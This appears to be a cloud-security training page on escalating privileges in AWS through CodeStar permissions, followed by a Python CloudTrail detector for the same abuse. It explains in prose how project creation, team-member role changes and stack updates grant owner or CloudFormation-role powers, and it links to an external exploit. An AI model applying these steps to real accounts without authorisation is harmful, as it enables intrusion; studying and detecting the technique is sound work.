AWS - Codestar Privesc
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE). Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
You can find more information about codestar in:
iam:PassRole, codestar:CreateProject
With these permissions you can abuse a CodeStar IAM role to perform arbitrary actions through a CloudFormation template. Check the following page:
codestar:CreateProject, codestar:AssociateTeamMember
This technique uses codestar:CreateProject to create a CodeStar project, and codestar:AssociateTeamMember to make an IAM user the owner of the new CodeStar project, which grants them a new policy with a few extra permissions.
If you are already a member of the project, you can use the permission codestar:UpdateTeamMember to update your role to owner instead of codestar:AssociateTeamMember.
Potential Impact: Privesc to the codestar policy generated. You can find an example of that policy in:
codestar:CreateProjectFromTemplate
Create a New Project:
Utilize the codestar:CreateProjectFromTemplate action to initiate the creation of a new project. Upon successful creation, access is automatically granted for cloudformation:UpdateStack. This access specifically targets a stack associated with the CodeStarWorker-<generic project name>-CloudFormation IAM role.
Update the Target Stack:
With the granted CloudFormation permissions, proceed to update the specified stack. The stack's name will typically conform to one of two patterns:
awscodestar-<generic project name>-infrastructure
awscodestar-<generic project name>-lambda
The exact name depends on the chosen template (see the example exploit script referenced below).
Access and Permissions:
Post-update, you obtain the capabilities assigned to the CloudFormation IAM role linked with the stack.
Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further.
For more information check the original research: https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/. You can find the exploit in https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py
Potential Impact: Privesc to cloudformation IAM role.
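As an added illustration from the detection side (not code from this page or from the Rhino Security Labs research), the following Python flags both sequences described above in CloudTrail records: a principal creating a CodeStar project and then adding or updating itself as Owner, and a principal creating a project from a template and then updating that project's awscodestar-<project>-* stack. The sample records are constructed, and the requestParameters key names used for the CodeStar calls are assumptions.

```python
import re

# Constructed CloudTrail-style records for this demo (not real logs). Top-level
# fields follow the CloudTrail record format; the requestParameters keys used
# for the CodeStar calls are assumptions made for the example.
SAMPLE_EVENTS = [
    {"eventName": "CreateProject", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"id": "proj1"}},
    {"eventName": "AssociateTeamMember", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"projectId": "proj1", "projectRole": "Owner",
                           "userArn": "arn:aws:iam::111111111111:user/dev"}},
    {"eventName": "CreateProjectFromTemplate", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/ci"},
     "requestParameters": {"projectId": "proj2"}},
    {"eventName": "UpdateStack", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/ci"},
     "requestParameters": {"stackName": "awscodestar-proj2-lambda"}},
    {"eventName": "UpdateStack", "userIdentity": {"arn": "arn:aws:iam::111111111111:user/ops"},
     "requestParameters": {"stackName": "prod-network"}},
]

# Names of the stacks CodeStar creates for a project, as described on this page.
CODESTAR_STACK = re.compile(r"^awscodestar-(?P<project>.+)-(infrastructure|lambda)$")


def find_codestar_privesc(events):
    """Return (principal_arn, pattern, project) for the two sequences on this page:
    'self-owner'     - create a project, then add/update yourself as Owner
    'template-stack' - create a project from a template, then update its
                       awscodestar-<project>-* stack (acting as its CloudFormation role)
    """
    created, findings = {}, []  # (principal, project) -> event that created it
    for ev in events:
        arn, name = ev["userIdentity"]["arn"], ev["eventName"]
        params = ev.get("requestParameters") or {}
        if name in ("CreateProject", "CreateProjectFromTemplate"):
            created[(arn, params.get("id") or params.get("projectId"))] = name
        elif name in ("AssociateTeamMember", "UpdateTeamMember"):
            proj = params.get("projectId")
            if (params.get("userArn") == arn and params.get("projectRole") == "Owner"
                    and (arn, proj) in created):
                findings.append((arn, "self-owner", proj))
        elif name == "UpdateStack":
            m = CODESTAR_STACK.match(params.get("stackName", ""))
            if m and created.get((arn, m["project"])) == "CreateProjectFromTemplate":
                findings.append((arn, "template-stack", m["project"]))
    return findings


if __name__ == "__main__":
    for hit in find_codestar_privesc(SAMPLE_EVENTS):
        print("suspicious CodeStar sequence:", hit)
```

The ops user's UpdateStack on a non-CodeStar stack is deliberately left unflagged, so the rule keys on the project-to-stack link rather than on UpdateStack alone.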